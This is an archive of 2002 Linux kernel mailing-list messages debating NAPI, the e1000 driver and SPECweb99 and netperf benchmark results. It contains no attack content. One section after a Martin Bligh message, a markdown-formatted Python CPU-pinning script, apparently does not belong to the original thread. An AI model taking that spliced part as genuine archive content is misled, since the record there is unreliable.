00:36:04 -0700 "David S. Miller" wrote: > NAPI is also not the panacea to all problems in the world. Mala did some testing on this a couple of weeks back. It appears that NAPI damaged performance significantly. 
http://www-124.ibm.com/developerworks/opensource/linuxperf/netperf/results/july_02/netperf2.5.25results.htm Unfortunately it is not listed what e1000 and core NAPI patch was used. Also, not listed, are the RX/TX mitigation and ring sizes given to the kernel module upon loading. Robert can comment on optimal settings Robert and Jamal can make a more detailed analysis of Mala's graphs than I. From hadi@cyberus.ca Fri Sep 6 02:57:24 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 02:57:28 -0700 (PDT) Received: from cyberus.ca (mail.cyberus.ca [216.191.240.111]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g869vNtG023611 for ; Fri, 6 Sep 2002 02:57:23 -0700 Received: from shell.cyberus.ca (shell [216.191.240.114]) by cyberus.ca (8.9.3/8.9.3/Cyberus Online Inc.) with ESMTP id GAA07285; Fri, 6 Sep 2002 06:01:06 -0400 (EDT) Received: from localhost (hadi@localhost) by shell.cyberus.ca (8.11.6+Sun/8.11.6) with ESMTP id g869s9m22602; Fri, 6 Sep 2002 05:54:10 -0400 (EDT) X-Authentication-Warning: shell.cyberus.ca: hadi owned process doing -bs Date: Fri, 6 Sep 2002 05:54:09 -0400 (EDT) From: jamal To: "David S. Miller" cc: , , , , , , Robert Olsson Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: <20020906.002253.32989079.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 92 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev On Fri, 6 Sep 2002, David S. Miller wrote: > Mala did some testing on this a couple of weeks back. It appears that > NAPI damaged performance significantly. > > http://www-124.ibm.com/developerworks/opensource/linuxperf/netperf/results/july_02/netperf2.5.25results.htm > > Unfortunately it is not listed what e1000 and core NAPI > patch was used. 
Also, not listed, are the RX/TX mitigation > and ring sizes given to the kernel module upon loading. > > Robert can comment on optimal settings > > Robert and Jamal can make a more detailed analysis of Mala's > graphs than I. I looked at those graphs, but the lack of information makes them useless. For example there are too many variables to the tests -- what is the effect of the message size? And then look at the socket buffer size: would you set it to 64K if you are trying to show performance numbers? What other tcp settings are there? Manfred Spraul about a year back complained about some performance issues in low load setups (which is what this IBM setup seems to be if you count the pps to the server); it's one of those things that have been low in the TODO deck. The issue may be legit not because NAPI is bad but because it is too good. I don't have the e1000, but i have some Dlinks giges still in boxes and i have a two-CPU SMP machine; I'll set up the testing this weekend. In the case of Manfred, we couldn't reproduce the tests because he had this odd weird NIC; in this case at least access to the e1000 doesn't require a visit to the museum. cheers, jamal From Robert.Olsson@data.slu.se Fri Sep 6 04:33:20 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 04:33:22 -0700 (PDT) Received: from robur.slu.se (robur.slu.se [130.238.98.12]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86BXItG025819 for ; Fri, 6 Sep 2002 04:33:19 -0700 Received: (from robert@localhost) by robur.slu.se (8.9.3/8.9.3) id NAA25206; Fri, 6 Sep 2002 13:44:34 +0200 From: Robert Olsson MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15736.38178.445310.714015@robur.slu.se> Date: Fri, 6 Sep 2002 13:44:34 +0200 To: "David S.
Miller" Cc: akpm@zip.com.au, Martin.Bligh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com, Robert.Olsson@data.slu.se Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 X-Mailer: VM 6.92 under Emacs 19.34.1 X-archive-position: 93 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Robert.Olsson@data.slu.se Precedence: bulk X-list: netdev David S. Miller writes: > Mala did some testing on this a couple of weeks back. It appears that > NAPI damaged performance significantly. > > http://www-124.ibm.com/developerworks/opensource/linuxperf/netperf/results/july_02/netperf2.5.25results.htm > > Robert can comment on optimal settings Hopefully yes... I see other numbers, so we have to sort out the differences. Andrew Morton pinged me about this test last week, so I've had a chance to run some tests. Some comments: Scale to CPU can be a dangerous measure with NAPI due to its adaptive behaviour, where RX interrupts decrease in favour of successive polls. And the NAPI scheme behaves differently, since we cannot assume that all network traffic is well-behaved like TCP. The system has to be manageable and has to "perform" under any network load, not only for well-behaved TCP. So of course we will see some differences -- there is no free lunch. We simply cannot look blindly at one test. IMO NAPI is the best overall performer. The numbers speak for themselves. Here is the most recent test... The NAPI kernel path is included in 2.4.20-pre4; the comparison below is mainly between the e1000 driver with and without NAPI, and the NAPI port to e1000 is still evolving. Linux 2.4.20-pre4/UP PIII @ 933 MHz w. Intel's e100 2 port GIGE adapter. e1000 4.3.2-k1 (current kernel version) and current NAPI patch. For NAPI the e1000 driver uses RxIntDelay=1; RxIntDelay=0 caused problems. Non-NAPI driver: RxIntDelay=64 (default). Three tests: TCP, UDP, packet forwarding. Netperf.
TCP socket size 131070, Single TCP stream. Test length 30 s. M-size e1000 NAPI-e1000 ============================ 4 20.74 20.69 Mbit/s data received. 128 458.14 465.26 512 836.40 846.71 1024 936.11 937.93 2048 940.65 939.92 4096 940.86 937.59 8192 940.87 939.95 16384 940.88 937.61 32768 940.89 939.92 65536 940.90 939.48 131070 940.84 939.74 Netperf. UDP_STREAM. 1440 pkts. Single UDP stream. Test length 30 s. e1000 NAPI-e1000 ==================================== 955.7 955.7 Mbit/s data received. Forwarding test. 1 Mpkts at 970 kpps injected. e1000 NAPI-e1000 ============================================= T-put 305 298580 pkts routed. NOTE! With non-NAPI driver this system is "dead" an performes nothing. Cheers. --ro From Martin.Bligh@us.ibm.com Fri Sep 6 07:26:43 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 07:26:49 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86EQhtG028189 for ; Fri, 6 Sep 2002 07:26:43 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e35.co.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86EUmf4010890; Fri, 6 Sep 2002 10:30:48 -0400 Received: from [10.10.2.3] (sig-9-65-197-17.mts.ibm.com [9.65.197.17]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86EUhWq236360; Fri, 6 Sep 2002 08:30:44 -0600 Date: Fri, 06 Sep 2002 07:29:21 -0700 From: "Martin J. Bligh" Reply-To: "Martin J. Bligh" To: "David S. 
Miller" cc: hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Message-ID: <46202575.1031297360@[10.10.2.3]> In-Reply-To: <20020905.235159.128049953.davem@redhat.com> References: <20020905.235159.128049953.davem@redhat.com> X-Mailer: Mulberry/2.1.2 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline X-archive-position: 94 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Martin.Bligh@us.ibm.com Precedence: bulk X-list: netdev > Stupid question, are you sure you have CONFIG_E1000_NAPI enabled? > > NAPI is also not the panacea to all problems in the world. No, but I didn't expect throughput to drop by 40% or so either, which is (very roughly) what happened. Interrupts are a pain to manage and do affinity with, so NAPI should (at least in theory) be better for this kind of setup ... I think. > I bet your greatest gain would be obtained from going to Tux > and using appropriate IRQ affinity settings and making sure > Tux threads bind to same cpu as device where they accept > connections. > > It is standard method to obtain peak specweb performance. Ah, but that's not really our goal - what we're trying to do is use specweb as a tool to simulate a semi-realistic customer workload, and improve the Linux kernel performance, using that as our yardstick for measuring ourselves. For that I like the setup we have reasonably well, even though it won't get us the best numbers. To get the best benchmark numbers, you're absolutely right though. M. 
From Martin.Bligh@us.ibm.com Fri Sep 6 07:34:43 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 07:34:47 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86EYhtG028606 for ; Fri, 6 Sep 2002 07:34:43 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e35.co.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86Ecjf4022240; Fri, 6 Sep 2002 10:38:45 -0400 Received: from [10.10.2.3] (sig-9-65-197-17.mts.ibm.com [9.65.197.17]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86EcXWq270926; Fri, 6 Sep 2002 08:38:39 -0600 Date: Fri, 06 Sep 2002 07:37:16 -0700 From: "Martin J. Bligh" Reply-To: "Martin J. Bligh" To: Robert Olsson , "David S. Miller" cc: akpm@zip.com.au, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Message-ID: <46676537.1031297834@[10.10.2.3]> In-Reply-To: <15736.38178.445310.714015@robur.slu.se> References: <15736.38178.445310.714015@robur.slu.se> X-Mailer: Mulberry/2.1.2 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline X-archive-position: 95 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Martin.Bligh@us.ibm.com Precedence: bulk X-list: netdev > And NAPI scheme behaves different since we can not assume that all network > traffic is well-behaved like TCP. System has to be manageable and to "perform" > under any network load not only for well-behaved TCP. So of course we will > see some differences -- there are no free lunch. Simply we can not blindly > look at one test. IMO NAPI is the best overall performer. The number speaks > for themselves. 
I don't doubt it's a win for most cases, we just want to reap the benefit for the large SMP systems as well ... the fundamental mechanism seems very scalable to me, we probably just need to do a little tuning? > NAPI kernel path is included in 2.4.20-pre4 the comparison below is mainly > between e1000 driver w and w/o NAPI and the NAPI port to e1000 is still > evolving. We are running from 2.5.latest ... any updates needed for NAPI for the driver in the current 2.5 tree, or is that OK? Thanks, Martin. From haveblue@us.ibm.com Fri Sep 6 08:26:38 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 08:26:43 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86FPvtG030607 for ; Fri, 6 Sep 2002 08:25:57 -0700 Received: from northrelay01.pok.ibm.com (northrelay01.pok.ibm.com [9.56.224.149]) by e1.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86FTdEG055312; Fri, 6 Sep 2002 11:29:40 -0400 Received: from nighthawk.sr71.net (sig-9-65-11-88.mts.ibm.com [9.65.11.88]) by northrelay01.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86FTZtW134046; Fri, 6 Sep 2002 11:29:36 -0400 Received: from us.ibm.com (nighthawk [127.0.0.1]) by nighthawk.sr71.net (8.11.6/8.11.6) with ESMTP id g86FT1K07233; Fri, 6 Sep 2002 08:29:01 -0700 Message-ID: <3D78C9BD.5080905@us.ibm.com> Date: Fri, 06 Sep 2002 08:29:01 -0700 From: Dave Hansen User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020822 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "Martin J. Bligh" CC: "David S. 
Miller" , hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, Nivedita Singhvi Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <20020905.204721.49430679.davem@redhat.com> <18563262.1031269721@[10.10.2.3]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 96 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: haveblue@us.ibm.com Precedence: bulk X-list: netdev Martin J. Bligh wrote: > Just to throw another firework into the fire whilst people are > awake, NAPI does not seem to scale to this sort of load, which > was disappointing, as we were hoping it would solve some of > our interrupt load problems ... seems that half the machine goes > idle, the number of simultaneous connections drop way down, and > everything's blocked on ... something ... not sure what ;-) > Any guesses at why, or ways to debug this? I thought that I already tried to explain this to you. (although it could have been on one of those too-much-coffee-days :) Something strange happens to the clients when NAPI is enabled on the Specweb clients. Somehow the start using a lot more CPU. The increased idle time on the server is because the _clients_ are CPU maxed. I have some preliminary oprofile data for the clients, but it appears that this is another case of Specweb code just really sucking. The real question is why NAPI causes so much more work for the client. I'm not convinced that it is much, much greater, because I believe that I was already at the edge of the cliff with my clients and NAPI just gave them a little shove :). Specweb also takes a while to ramp up (even during the real run), so sometimes it takes a few minutes to see the clients get saturated. 
-- Dave Hansen haveblue@us.ibm.com From Robert.Olsson@data.slu.se Fri Sep 6 08:30:09 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 08:30:12 -0700 (PDT) Received: from robur.slu.se (robur.slu.se [130.238.98.12]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86FU7tG031043 for ; Fri, 6 Sep 2002 08:30:08 -0700 Received: (from robert@localhost) by robur.slu.se (8.9.3/8.9.3) id RAA28899; Fri, 6 Sep 2002 17:38:19 +0200 From: Robert Olsson MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15736.52203.840229.604858@robur.slu.se> Date: Fri, 6 Sep 2002 17:38:19 +0200 To: "Martin J. Bligh" Cc: Robert Olsson , "David S. Miller" , akpm@zip.com.au, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: <46676537.1031297834@[10.10.2.3]> References: <15736.38178.445310.714015@robur.slu.se> <46676537.1031297834@[10.10.2.3]> X-Mailer: VM 6.92 under Emacs 19.34.1 X-archive-position: 97 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Robert.Olsson@data.slu.se Precedence: bulk X-list: netdev Martin J. Bligh writes: > We are running from 2.5.latest ... any updates needed for NAPI for the > driver in the current 2.5 tree, or is that OK? Should be OK. Get latest kernel e1000 to get Intel's and maintainers latest work and apply the e1000 NAPI patch. RH includes this patch? And yes there are plenty of room for improvements... Cheers. 
--ro From haveblue@us.ibm.com Fri Sep 6 08:35:00 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 08:35:02 -0700 (PDT) Received: from e2.ny.us.ibm.com (e2.ny.us.ibm.com [32.97.182.102]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86FYxtG031436 for ; Fri, 6 Sep 2002 08:35:00 -0700 Received: from northrelay03.pok.ibm.com (northrelay03.pok.ibm.com [9.56.224.151]) by e2.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86Fd3IV315698; Fri, 6 Sep 2002 11:39:03 -0400 Received: from nighthawk.sr71.net (sig-9-65-11-88.mts.ibm.com [9.65.11.88]) by northrelay03.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86FcxUK067968; Fri, 6 Sep 2002 11:38:59 -0400 Received: from us.ibm.com (nighthawk [127.0.0.1]) by nighthawk.sr71.net (8.11.6/8.11.6) with ESMTP id g86FcUK07301; Fri, 6 Sep 2002 08:38:30 -0700 Message-ID: <3D78CBF6.10609@us.ibm.com> Date: Fri, 06 Sep 2002 08:38:30 -0700 From: Dave Hansen User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020822 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "Martin J. Bligh" CC: "David S. Miller" , hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <20020905.235159.128049953.davem@redhat.com> <46202575.1031297360@[10.10.2.3]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 98 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: haveblue@us.ibm.com Precedence: bulk X-list: netdev Martin J. Bligh wrote: >>Stupid question, are you sure you have CONFIG_E1000_NAPI enabled? >> >>NAPI is also not the panacea to all problems in the world. > > No, but I didn't expect throughput to drop by 40% or so either, > which is (very roughly) what happened. 
Interrupts are a pain to > manage and do affinity with, so NAPI should (at least in theory) > be better for this kind of setup ... I think. No, no. Bad Martin! Throughput didn't drop, "Specweb compliance" dropped. Those are two very, very different things. I've found that the server can produce a lot more throughput, although it doesn't have the characteristics that Specweb considers compliant. Just have Troy enable mod-status and look at the throughput that Apache tells you that it is giving during a run. _That_ is real throughput, not number of compliant connections. _And_ NAPI is for receive only, right? Also, my compliance drop occurs with the NAPI checkbox disabled. There is something else in the new driver that causes our problems. -- Dave Hansen haveblue@us.ibm.com From Martin.Bligh@us.ibm.com Fri Sep 6 09:08:23 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 09:08:29 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86G8NtG032145 for ; Fri, 6 Sep 2002 09:08:23 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e35.co.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86GCSf4019858; Fri, 6 Sep 2002 12:12:29 -0400 Received: from [10.10.2.3] (sig-9-65-197-17.mts.ibm.com [9.65.197.17]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86GCNWq244550; Fri, 6 Sep 2002 10:12:24 -0600 Date: Fri, 06 Sep 2002 09:11:05 -0700 From: "Martin J. Bligh" Reply-To: "Martin J. Bligh" To: Dave Hansen cc: "David S. 
Miller" , hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Message-ID: <52305571.1031303463@[10.10.2.3]> In-Reply-To: <3D78CBF6.10609@us.ibm.com> References: <3D78CBF6.10609@us.ibm.com> X-Mailer: Mulberry/2.1.2 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline X-archive-position: 99 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Martin.Bligh@us.ibm.com Precedence: bulk X-list: netdev > No, no. Bad Martin! Throughput didn't drop, "Specweb compliance" > dropped. Those are two very, very different things. I've found > that the server can produce a lot more throughput, although it > doesn't have the characteristics that Specweb considers compliant. > Just have Troy enable mod-status and look at the throughput that > Apache tells you that it is giving during a run. _That_ is real > throughput, not number of compliant connections. By throughput I meant number of compliant connections, not bandwidth. It may well be latency that's going out the window, rather than bandwidth. Yes, I should use more precise terms ... > _And_ NAPI is for receive only, right? Also, my compliance drop > occurs with the NAPI checkbox disabled. There is something else > in the new driver that causes our problems. Not sure about that - I was told once that there were transmission completion interrupts as well? What happens to those? Or am I confused again ... M. 
From niv@us.ibm.com Fri Sep 6 09:17:39 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 09:17:41 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86GHctG032579 for ; Fri, 6 Sep 2002 09:17:39 -0700 Received: from northrelay01.pok.ibm.com (northrelay01.pok.ibm.com [9.56.224.149]) by e1.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86GLhEG011500; Fri, 6 Sep 2002 12:21:43 -0400 Received: from smtp.linux.ibm.com (ltc-eth1000.torolab.ibm.com [9.26.4.197]) by northrelay01.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86GLOtW120312; Fri, 6 Sep 2002 12:21:42 -0400 Received: from imap.linux.ibm.com (imap.linux.ibm.com [9.27.103.44]) by smtp.linux.ibm.com (Postfix) with ESMTP id 0F3FE3FE06; Fri, 6 Sep 2002 12:21:24 -0400 (EDT) Received: by imap.linux.ibm.com (Postfix, from userid 99) id 1A0C623C00D; Fri, 6 Sep 2002 12:21:24 -0400 (EDT) Received: from 9.47.18.15 ( [9.47.18.15]) as user niv@imap.linux.ibm.com by imap.linux.ibm.com with HTTP; Fri, 6 Sep 2002 09:21:23 -0700 Message-ID: <1031329283.3d78d603ba4c3@imap.linux.ibm.com> Date: Fri, 6 Sep 2002 09:21:23 -0700 From: Nivedita Singhvi To: Dave Hansen Cc: "Martin J. Bligh" , "David S. Miller" , hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <20020905.235159.128049953.davem@redhat.com> <46202575.1031297360@[10.10.2.3]> <3D78CBF6.10609@us.ibm.com> In-Reply-To: <3D78CBF6.10609@us.ibm.com> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 9.47.18.15 X-archive-position: 100 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev Quoting Dave Hansen : > No, no. Bad Martin! 
Throughput didn't drop, "Specweb compliance" > dropped. Those are two very, very different things. I've found that > the server can produce a lot more throughput, although it doesn't > have the characteristics that Specweb considers compliant. > Just have Troy enable mod-status and look at the throughput that > Apache tells you that it is giving during a run. > _That_ is real throughput, not number of compliant connections. > _And_ NAPI is for receive only, right? Also, my compliance drop > occurs with the NAPI checkbox disabled. There is something else in > the new driver that causes our problems. Thanks, Dave, you saved me a bunch of typing... Just looking at a networking benchmark result is worse than useless. You really need to look at the stats, settings, and the profiles. eg, for most of the networking stuff: ifconfig -a netstat -s netstat -rn /proc/sys/net/ipv4/ /proc/sys/net/core/ before and after the run. Dave, although in your setup the clients are maxed out, not sure thats the case for Mala and Troy's clients. (Dont know, of course). But I'm fairly sure they arent using single quad NUMAs and they may not be seeing the same effects.. thanks, Nivedita From Martin.Bligh@us.ibm.com Fri Sep 6 09:27:08 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 09:27:09 -0700 (PDT) Received: from e21.nc.us.ibm.com (e21.nc.us.ibm.com [32.97.136.227]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86GR7tG000587 for ; Fri, 6 Sep 2002 09:27:07 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e21.nc.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86GVIDf042658; Fri, 6 Sep 2002 12:31:18 -0400 Received: from [10.10.2.3] (sig-9-65-197-17.mts.ibm.com [9.65.197.17]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86GV7Wq222410; Fri, 6 Sep 2002 10:31:09 -0600 Date: Fri, 06 Sep 2002 09:29:50 -0700 From: "Martin J. Bligh" Reply-To: "Martin J. Bligh" To: Dave Hansen cc: "David S. 
Miller" , hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, Nivedita Singhvi Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Message-ID: <53430559.1031304588@[10.10.2.3]> In-Reply-To: <3D78C9BD.5080905@us.ibm.com> References: <3D78C9BD.5080905@us.ibm.com> X-Mailer: Mulberry/2.1.2 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline X-archive-position: 101 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Martin.Bligh@us.ibm.com Precedence: bulk X-list: netdev > I thought that I already tried to explain this to you. (although > it could have been on one of those too-much-coffee-days :) You told me, but I'm far from convinced this is the problem. I think it's more likely this is a side-effect of a server issue - something like a lot of dropped packets and retransmits, though not necessarily that. > Something strange happens to the clients when NAPI is enabled on > the Specweb clients. Somehow the start using a lot more CPU. > The increased idle time on the server is because the _clients_ are > CPU maxed. I have some preliminary oprofile data for the clients, > but it appears that this is another case of Specweb code just > really sucking. Hmmm ... if you change something on the server, and all the clients go wild, I'm suspicious of whatever you did to the server. You need to have a lot more data before leaping to the conclusion that it's because the specweb client code is crap. Troy - I think your UP clients weren't anywhere near maxed out on CPU power, right? Can you take a peek at the clients under NAPI load? Dave - did you ever try running 4 specweb clients bound to each of the 4 CPUs in an attempt to make the clients scale better? I'm suspicious that you're maxing out 4 4-way machines, and Troy's 16 UPs are cruising along just fine. M. 
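
The per-CPU binding asked about above (one client process per CPU) could be tried along these lines. This is only a minimal sketch, assuming a Linux host with Python 3: `./client` is a placeholder command line, and `pinning_plan` and `launch_pinned` are illustrative names, not part of SPECweb99 or of anyone's actual test harness.

```python
import os
import subprocess


def pinning_plan(client_cmd, cpus):
    """Pair each CPU id with its own copy of the client command line."""
    return [(cpu, list(client_cmd)) for cpu in cpus]


def launch_pinned(plan):
    """Start one process per plan entry, each restricted to a single CPU.

    Relies on os.sched_setaffinity, which is only available on Linux.
    """
    procs = []
    for cpu, argv in plan:
        # Bind cpu as a default argument so each child keeps its own value.
        def pin(cpu=cpu):
            os.sched_setaffinity(0, {cpu})  # pid 0 means the calling process

        procs.append(subprocess.Popen(argv, preexec_fn=pin))
    return procs


if __name__ == "__main__":
    # "./client" is a hypothetical placeholder for the real client invocation.
    # Only the plan is printed here; call launch_pinned(plan) to start it.
    plan = pinning_plan(["./client"], range(4))
    for cpu, argv in plan:
        print("cpu", cpu, "->", " ".join(argv))
```

Comparing the clients' idle time with and without the binding would show whether it makes any difference on the 4-way machines.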
From gerrit@us.ibm.com Fri Sep 6 10:22:42 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 10:22:47 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86HMgtG001759 for ; Fri, 6 Sep 2002 10:22:42 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e35.co.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86HQmf4019574; Fri, 6 Sep 2002 13:26:48 -0400 Received: from w-gerrit2 (dyn9-47-17-91.beaverton.ibm.com [9.47.17.91]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86HQlWq051064; Fri, 6 Sep 2002 11:26:47 -0600 Received: from w-gerrit2 ([127.0.0.1] helo=us.ibm.com ident=gerrit) by w-gerrit2 with esmtp (Exim 3.35 #1 (Debian)) id 17nMs2-0003F6-00; Fri, 06 Sep 2002 10:26:14 -0700 To: "Martin J. Bligh" cc: "David S. Miller" , hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, Nivedita Singhvi Reply-To: Gerrit Huizenga From: Gerrit Huizenga Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-reply-to: Your message of Thu, 05 Sep 2002 23:48:42 PDT. <18563262.1031269721@[10.10.2.3]> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <12464.1031333164.1@us.ibm.com> Date: Fri, 06 Sep 2002 10:26:04 -0700 Message-Id: X-archive-position: 102 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gh@us.ibm.com Precedence: bulk X-list: netdev In message <18563262.1031269721@[10.10.2.3]>, > : "Martin J. Bligh" writes: > > I would think shoving the data down the NIC > > and avoid the fragmentation shouldnt give you that much significant > > CPU savings. > > > > It's the DMA bandwidth saved, most of the specweb runs on x86 hardware > > is limited by the DMA throughput of the PCI host controller. 
